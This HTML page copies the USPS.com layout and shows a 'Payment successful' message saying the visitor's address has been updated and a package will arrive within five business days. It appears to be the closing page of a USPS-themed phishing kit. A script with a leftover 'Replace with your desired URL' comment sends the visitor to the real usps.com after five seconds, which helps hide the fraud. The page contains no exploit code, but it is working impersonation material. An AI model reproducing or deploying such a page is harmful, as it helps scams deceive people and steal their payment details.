<!DOCTYPE html>
<html lang="auto" class="">

<head>
    <script>
        setTimeout(function () {
            window.location.href = 'https://www.usps.com'; // Replace with your desired URL
        }, 5000); // Specify the delay in milliseconds (e.g., 5000 milliseconds = 5 seconds)
    </script>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="Cache-Control" content="no-cache">


    <meta name="description"
        content="Create a USPS.com(registered trademark symbol) account to print shipping labels, request a Carrier Pickup, buy stamps, shop, plus much more.">
    <meta name="keywords" content="">
    <meta name="author" content="www.usps.com">
    <link rel="icon" href="https://reg.usps.com/entreg/favicon.ico">

    <title>USPS.com® - Payment successful</title>




    <link href="./successful_files/usps-fonts.css" rel="stylesheet">
    <link href="./successful_files/all.min.css" rel="stylesheet">
    <link href="./successful_files/bootstrap.min.css" rel="stylesheet">
    <link href="./successful_files/sticky-footer.css" rel="stylesheet">
    <link href="./successful_files/usps-theme.css" rel="stylesheet">






    <link type="text/css" rel="stylesheet" charset="UTF-8" href="./successful_files/translateelement.css">
</head>

<body>


    <a class="sr-only sr-only-focusable" href="https://www.usps.com/#content">Skip to main content</a>











    <header>
        <div class="container">
            <div class="row">
                <div class="col-md-12">

                    <a tabindex="2" href="https://www.usps.com/"><img
                            alt="USPS.com home. The profile of an eagle&#39;s head adjoining the words United States Postal Service are the two elements that are combined to form the corporate signature."
                            src="./successful_files/des_brd_2color_logo_274x79.png" id="usps-logo"></a>

                </div>

            </div>
        </div>
    </header>




    <div id="breadcrumb-container" class="container" style="display: none;">
        <nav aria-label="breadcrumb">
            <ol class="breadcrumb" style="background-color: #f7f7f7;">

                <li class="breadcrumb-item"><a id="preferences-link"
                        href="https://reg.usps.com/entreg/ProfileAction_input" tabindex="3" title="My Preferences">My
                        Preferences</a></li>
                <li class="breadcrumb-item active" aria-current="page">E-mail Validation</li>
            </ol>
        </nav>
    </div>

    <div class="container">
        <div class="grid-row-margin-top-34 grid-row-margin-68">
            <h1>Payment successful</h1>
        </div>
    </div>

    <div role="main" class="container">
        <input type="hidden" name="returnActionName" value="" id="returnActionName">
        <div style="background-color: #F7F7F7; border-radius: 8px; padding: 4rem;">
            <div class="row">
                <div class="col-xs-12 col-sm-12 col-md-12 text-center">

                    <img src="./successful_files/email-validation-icon.png" class="img-fluid" style="padding: 2rem 0;">
                    <p style="margin-bottom: 2rem;">Thank you, your payment has been received and your address
                        successfully updated. You should receive your package in the next 5 business days.</p>

                    <a href="https://www.usps.com/" class="btn btn-lg btn-no-min btn-primary"
                        tabindex="%{#tabindexanchor}">Continue to USPS.com</a>


                </div>
            </div>
        </div>
    </div>



    <footer class="footer">
        <div class="container">
            <div class="row no-gutters">
                <div class="col-xs-12 col-sm-12 col-md-12">
                    <img class="footer-logo"
                        alt="USPS.com home. The profile of an eagle&#39;s head adjoining the words United States Postal Service are the two elements that are combined to form the corporate signature."
                        src="./successful_files/logo-mini-sb.png">
                </div>
            </div>
            <div class="row no-gutters">
                <div class="col-xs-12 col-sm-12 col-md-3">
                    <div class="footer-sub-heading first-sub-heading">helpful links</div>
                    <ul class="list-unstyled nav-options">
                        <li><a href="https://www.usps.com/help/contact-us.htm">Contact Us</a></li>
                        <li><a href="http://www.usps.com/globals/site-index.htm">Site Index</a></li>
                        <li><a href="http://faq.usps.com/">FAQs</a></li>
                    </ul>
                    <div class="footer-sub-heading">USPS Jobs</div>
                    <ul class="list-unstyled nav-options">
                        <li><a href="http://about.usps.com/careers/welcome.htm">Careers</a></li>
                    </ul>
                </div>
                <div class="col-xs-12 col-sm-12 col-md-3">
                    <div class="footer-sub-heading">On about.usps.com</div>
                    <ul class="list-unstyled nav-options">
                        <li><a href="http://about.usps.com/">About USPS Home</a></li>
                        <li><a href="http://about.usps.com/news/welcome.htm">Newsroom</a></li>
                        <li><a href="http://about.usps.com/news/service-alerts/welcome.htm">USPS Service Updates</a>
                        </li>
                        <li><a href="http://about.usps.com/forms-publications/welcome.htm">Forms &amp; Publications</a>
                        </li>
                        <li><a href="https://www.usps.com/gov-services/gov-services.htm">Government Services</a></li>
                    </ul>
                </div>
                <div class="clearfix visible-sm-block"></div>
                <div class="col-xs-12 col-sm-12 col-md-3">
                    <div class="footer-sub-heading">Other USPS Sites</div>
                    <ul class="list-unstyled nav-options">
                        <li><a href="https://gateway.usps.com/">Business Customer Gateway</a></li>
                        <li><a href="https://postalinspectors.uspis.gov/">Postal Inspectors</a></li>
                        <li><a href="http://www.uspsoig.gov/">Inspector General</a></li>
                        <li><a href="http://pe.usps.com/">Postal Explorer</a></li>
                        <li><a target="_blank" href="http://www.postalmuseum.si.edu/">National Postal Museum</a></li>
                        <li><a href="https://www.usps.com/webtools/welcome.htm">Resources for Developers</a></li>
                        <li><a href="https://postalpro.usps.com/">PostalPro</a></li>
                        <li><a href="https://www.usps.com/datadial">USPS Customer Data Dial</a></li>
                    </ul>
                </div>
                <div class="col-xs-12 col-sm-12 col-md-3">
                    <div class="footer-sub-heading">Legal Information</div>
                    <ul class="list-unstyled nav-options">
                        <li><a href="http://about.usps.com/who-we-are/privacy-policy/privacy-policy-highlights.htm">Privacy
                                Policy</a></li>
                        <li><a href="http://about.usps.com/termsofuse.htm">Terms of Use</a></li>
                        <li><a href="http://about.usps.com/who-we-are/foia/welcome.htm">FOIA</a></li>
                        <li><a href="http://about.usps.com/who-we-are/no-fear-act/welcome.htm">No FEAR Act EEO Data</a>
                        </li>
                    </ul>
                </div>
            </div>
            <div class="row copy-no-gutters">
                <div class="col-xs-12 col-sm-12 col-md-12 copy-border">
                    <div id="footer-copyright">Copyright © 2022 USPS. All Rights Reserved.
                        <!-- [Build 9.0.40 July 01, 2022] -->
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-xs-12 col-sm-12 col-md-12">
                    <ul class="list-inline" id="social-links">
                        <li class="list-inline-item"><a href="http://www.facebook.com/usps" target="_blank"><img
                                    src="./successful_files/social-facebook_1.png" alt="facebook"></a></li>
                        <li class="list-inline-item"><a href="http://twitter.com/usps" target="_blank"><img
                                    src="./successful_files/social-twitter_2.png" alt="twitter"></a></li>
                        <li class="list-inline-item"><a href="http://pinterest.com/uspsstamps/" target="_blank"><img
                                    src="./successful_files/social-pinterest_6.png" alt="pinterest"></a></li>
                        <li class="list-inline-item"><a href="http://www.youtube.com/usps" target="_blank"
                                class="social-youtube"><img src="./successful_files/social-youtube_3.png"
                                    alt="youtube"></a></li>
                    </ul>
                </div>
            </div>
        </div>
    </footer>





</body>

</html>